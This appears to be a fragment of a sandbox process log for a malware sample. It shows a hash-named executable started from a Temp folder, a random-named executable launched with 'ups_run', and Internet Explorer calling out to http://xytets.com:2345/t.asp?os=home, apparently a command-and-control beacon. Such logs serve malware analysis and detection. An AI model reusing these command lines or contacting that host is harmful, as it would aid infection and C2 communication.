dca205429af844e31f312f41ea6927d425b9ff921b8dfe89b3efa7234d74c890.exe "C:\Users\Administrator\AppData\Local\Temp\dca205429af844e31f312f41ea6927d425b9ff921b8dfe89b3efa7234d74c890.exe"
1508CreateProcess.exe C:\temp\CreateProcess.exe C:\Temp\omhezwrpjh.exe ups_run
1500iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" http://xytets.com:2345/t.asp?os=home
1660